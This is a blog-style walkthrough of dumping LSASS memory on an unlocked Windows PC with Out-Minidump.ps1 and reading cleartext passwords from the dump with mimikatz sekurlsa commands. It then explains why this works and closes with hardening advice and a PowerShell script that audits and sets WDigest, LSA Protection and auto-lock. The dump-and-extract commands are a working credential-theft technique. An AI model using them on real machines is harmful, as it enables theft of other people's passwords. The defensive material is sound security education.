Uncover a user's password from an unlocked Windows PC in less than 5 minutes

I found an article mentioning an existing vulnerability in the Windows OS where you can get a plaintext view of your passwords on any unlocked Windows PC. So I tried it on my Windows 10 PC and found that the vulnerability still exists. The method used here is not new at all, and anyone can perform this hack on any unlocked Windows PC, provided that they know how to use the following tools.

In summary, here is what you need to do:

Tools you need

Out-Minidump.ps1 (the PowerShell script that dumps the LSASS process) and mimikatz. Download both tools first.

1. Perform memory dump using the PowerShell script

To perform the LSASS dump, I will use the PowerShell script Out-Minidump.ps1. The sequence of commands looks like this (run from an elevated PowerShell prompt, because opening lsass.exe for reading requires SeDebugPrivilege, which only an administrative token holds):

(Screenshot: PowerShell cmdlet)
. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1'
# "dot source" the script so that its Out-Minidump function is loaded into the current session

Get-Process lsass | Out-Minidump
# dump the LSASS process; the file is written to the current directory as lsass_<PID>.dmp

Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground'
# copy the dump file (868 was the PID of lsass.exe on this machine) to the desired location

2. View the passwords using the mimikatz terminal program

As you can see, lsass_868.dmp is the LSASS dump file captured with the PowerShell script (the number is the process ID of lsass.exe at the time of the dump). Now I need to load the dump file in the mimikatz terminal as follows:

sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
(Screenshot: mimikatz MINIDUMP)

mimikatz switches to the MINIDUMP file, so the credentials are now read from the dump instead of from the live lsass.exe process. Now I will run this command to display all the logon sessions and the credentials cached for each of them:

sekurlsa::logonPasswords full

Voila! There, I can see my actual Microsoft Account username and password in a plaintext view.

(Screenshot: mimikatz logonPasswords)

Explanation of the vulnerability

The password is indeed encrypted in memory, but that encryption is useless against this attack: LSASS protects the credential material with two LSA functions, LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function), and the key they use lives inside the LSASS process itself. In other words, Windows keeps these passwords in a reversibly encrypted form rather than as a one-way hash, so anyone who can read LSASS memory (the live process or a dump of it) can recover the key and decrypt them back to plaintext, which is exactly what the sekurlsa module of mimikatz reimplements. The cleartext password that sekurlsa::logonPasswords prints is typically the copy cached by the WDigest authentication package; on Windows 8.1, Windows 10 and Windows 7/8 with KB2871997 applied this caching is off by default unless the registry value UseLogonCredential under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest is set to 1, while the NTLM hash and Kerberos material of each logon session stay in LSASS memory regardless.

It is RECOMMENDED to always LOCK your Windows PC when you are away, especially in the office or in a public place. This hack can be done in less than five minutes! Locking the screen is the minimum, though, because an attacker who already has an elevated session does not need your unattended desktop at all. Also disable WDigest cleartext caching (UseLogonCredential = 0), enable LSA Protection (RunAsPPL = 1 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa) so that unsigned tools such as Out-Minidump and mimikatz can no longer open lsass.exe, enable Credential Guard where the Windows edition and hardware support it, and set a machine inactivity limit so the PC locks itself when you forget to.
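The following PowerShell script is an added example written for this page and is not the author's code or part of Out-Minidump or mimikatz. It audits the settings that decide whether an LSASS dump yields cleartext passwords (WDigest caching, LSA Protection, Credential Guard, automatic lock) and can apply the registry hardening. The registry paths, value names and the Win32_DeviceGuard class are the documented Windows ones; the function names, the default lock timeout of 600 seconds and the shape of the output object are my own choices. Run it from an elevated PowerShell prompt.

```powershell
# Added example (not the author's code): audit and harden the settings that decide
# whether an LSASS dump yields cleartext passwords. Run from an elevated prompt.
# Registry paths/value names are the documented ones; function names are my own.

$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$LsaKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$PolicyKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-RegDword {
    # Returns the DWORD value, or $null when the value (or its key) does not exist.
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

function Get-LsassCredentialExposure {
    # UseLogonCredential = 1 makes the WDigest provider keep the cleartext password
    # in LSASS memory (the value mimikatz prints). On Windows 8.1/10 and patched
    # 7/8 a missing value means the secure default, 0.
    $useLogonCred = Get-RegDword -Path $WDigestKey -Name UseLogonCredential
    if ($null -eq $useLogonCred) { $useLogonCred = 0 }

    # RunAsPPL = 1 runs lsass.exe as a protected process (PPL); unsigned tools such
    # as Out-Minidump or mimikatz can no longer open it for reading.
    $runAsPpl = Get-RegDword -Path $LsaKey -Name RunAsPPL
    if ($null -eq $runAsPpl) { $runAsPpl = 0 }

    # Credential Guard isolates the secrets outside LSASS. Win32_DeviceGuard reports
    # it as service id 1 in SecurityServicesRunning (the class is absent on editions
    # without VBS support, which counts as "not running").
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
        -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuard = ($null -ne $dg) -and (@($dg.SecurityServicesRunning) -contains 1)

    # "Interactive logon: Machine inactivity limit" in seconds; absent/0 = no auto lock.
    $idle = Get-RegDword -Path $PolicyKey -Name InactivityTimeoutSecs

    [pscustomobject]@{
        WDigestCleartextCached = ($useLogonCred -eq 1)   # $true = the attack on this page prints the password
        LsaProtectionEnabled   = ($runAsPpl -eq 1)
        CredentialGuardRunning = $credGuard
        InactivityLockSeconds  = $idle
    }
}

function Set-LsassHardening {
    # Applies the registry side of the recommendations; supports -WhatIf / -Confirm.
    # Credential Guard is deliberately not touched here: it needs VBS, UEFI and
    # usually a Group Policy or Intune deployment, not a single registry value.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([int]$InactivityLockSeconds = 600)   # my default: lock after 10 minutes idle

    if ($PSCmdlet.ShouldProcess('WDigest', 'Set UseLogonCredential = 0')) {
        New-ItemProperty -Path $WDigestKey -Name UseLogonCredential `
            -PropertyType DWord -Value 0 -Force | Out-Null
    }
    if ($PSCmdlet.ShouldProcess('Lsa', 'Set RunAsPPL = 1 (effective after reboot)')) {
        New-ItemProperty -Path $LsaKey -Name RunAsPPL `
            -PropertyType DWord -Value 1 -Force | Out-Null
    }
    if ($PSCmdlet.ShouldProcess('Policies\System', "Set InactivityTimeoutSecs = $InactivityLockSeconds")) {
        New-ItemProperty -Path $PolicyKey -Name InactivityTimeoutSecs `
            -PropertyType DWord -Value $InactivityLockSeconds -Force | Out-Null
    }
}

# Usage:
#   Get-LsassCredentialExposure        # audit before
#   Set-LsassHardening -WhatIf         # preview the changes
#   Set-LsassHardening                 # apply; reboot for RunAsPPL to take effect
#   Get-LsassCredentialExposure        # audit after
```

Re-running the audit after a reboot should show WDigestCleartextCached = False and LsaProtectionEnabled = True; with LSA Protection on, the Get-Process lsass | Out-Minidump step from the walkthrough fails with an access-denied error even from an elevated prompt, and with WDigest caching off the sekurlsa::logonPasswords output no longer contains the cleartext password even if a dump is obtained by other means.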